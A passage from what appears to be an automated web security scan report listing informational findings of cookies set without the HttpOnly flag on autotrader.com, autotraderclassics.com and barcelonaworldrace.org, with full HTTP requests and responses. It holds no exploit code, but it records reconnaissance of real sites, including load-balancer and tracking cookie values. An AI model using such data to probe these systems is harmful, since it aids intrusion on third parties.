  • v1st=4BE5B3481EBAD751; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767492827; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
  • BIGipServerwww=2022236170.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0006_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=4BE5B3481EBAD751; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767492827; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=2022236170.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

14.659. http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0009_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=DE05B78BAE6BA143; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767489238; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
  • BIGipServerwww=2575884298.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0009_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=DE05B78BAE6BA143; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767489238; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=2575884298.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

14.660. http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /no_cache/ac/trader_clicks_0016_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=F295814A75AF51AA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295884767489157; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
  • BIGipServerwww=1250484234.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /no_cache/ac/trader_clicks_0016_nocount.asis? HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:27 GMT
Server: Apache
Set-Cookie: v1st=F295814A75AF51AA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295884767489157; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain
Set-Cookie: BIGipServerwww=1250484234.61475.0000; path=/

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

14.661. http://www.autotrader.com/research/certified-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/certified-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=49F204915327FA62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885065453031; path=/; expires=Sat, 03-Jan-15 16:04:25 GMT; domain=.autotrader.com
  • BIGipServerwww=1787355146.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/certified-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:25 GMT
Server: Apache
Set-Cookie: v1st=49F204915327FA62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885065453031; path=/; expires=Sat, 03-Jan-15 16:04:25 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1787355146.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.662. http://www.autotrader.com/research/certified-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/certified-cars/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=3056756234.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/certified-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:55:24 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3056756234.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.663. http://www.autotrader.com/research/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=2D8D8CB669EE0E07; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885066866955; path=/; expires=Sat, 03-Jan-15 16:04:26 GMT; domain=.autotrader.com
  • BIGipServerwww=1971904522.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:26 GMT
Server: Apache
Set-Cookie: v1st=2D8D8CB669EE0E07; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885066866955; path=/; expires=Sat, 03-Jan-15 16:04:26 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1971904522.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.664. http://www.autotrader.com/research/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=3442632202.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:55:39 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3442632202.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.665. http://www.autotrader.com/research/new-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/new-cars/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=4113720842.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/new-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:55:49 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=4113720842.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.666. http://www.autotrader.com/research/new-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/new-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=FD01CADD9CE8D858; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885067871732; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
  • BIGipServerwww=2525552650.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/new-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:27 GMT
Server: Apache
Set-Cookie: v1st=FD01CADD9CE8D858; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885067871732; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=2525552650.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.667. http://www.autotrader.com/research/used-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/used-cars/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=2033346058.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/used-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:55:11 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=2033346058.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.668. http://www.autotrader.com/research/used-cars/index.jsp/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /research/used-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=F1B5B0190A0903E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885064281746; path=/; expires=Sat, 03-Jan-15 16:04:24 GMT; domain=.autotrader.com
  • BIGipServerwww=1871241226.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/used-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:24 GMT
Server: Apache
Set-Cookie: v1st=F1B5B0190A0903E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885064281746; path=/; expires=Sat, 03-Jan-15 16:04:24 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1871241226.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.669. http://www.autotrader.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerwww=1787355146.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 16:04:23 GMT
Server: Apache
Location: http://www.autotrader.com/x22/
Vary: Accept-Encoding
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww=1787355146.61475.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.autotrader.c
...[SNIP]...

14.670. http://www.autotrader.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=707945994.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 23:54:50 GMT
Server: Apache
Location: http://www.autotrader.com/x22/
Vary: Accept-Encoding
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=707945994.61475.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.autotrader.c
...[SNIP]...

14.671. http://www.autotrader.com/x22/x3e/x3cli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /x22/x3e/x3cli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=44290BD80D43DD62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
  • ATC_ID=173.193.214.243.1295885061096866; path=/; expires=Sat, 03-Jan-15 16:04:21 GMT; domain=.autotrader.com
  • BIGipServerwww=1351147530.61475.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:21 GMT
Server: Apache
Set-Cookie: v1st=44290BD80D43DD62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885061096866; path=/; expires=Sat, 03-Jan-15 16:04:21 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1351147530.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.672. http://www.autotrader.com/x22/x3e/x3cli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /x22/x3e/x3cli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerAT-Production_hhtp=875718154.61475.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:54:34 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=875718154.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.673. http://www.autotraderclassics.com/find/index.xhtml/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /find/index.xhtml/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
  • ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
  • BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:30 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...

14.674. http://www.autotraderclassics.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
  • ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
  • BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:29 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...

14.675. http://www.barcelonaworldrace.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SERVERID=iom-web11; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Tue, 25 Jan 2011 14:24:31 GMT
Server: Apache
Location: http://www.barcelonaworldrace.org/en/index.php
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/


14.676. http://www.barcelonaworldrace.org/en/actualite/breves

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SERVERID=iom-web10; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/actualite/breves HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 25 Jan 2011 14:24:24 GMT
Server: Apache
Location: http://www.barcelonaworldrace.org/en/actualite/breves/
Content-Length: 262
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SERVERID=iom-web10; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.barcelonawor
...[SNIP]...

14.677. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SERVERID=iom-web11; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

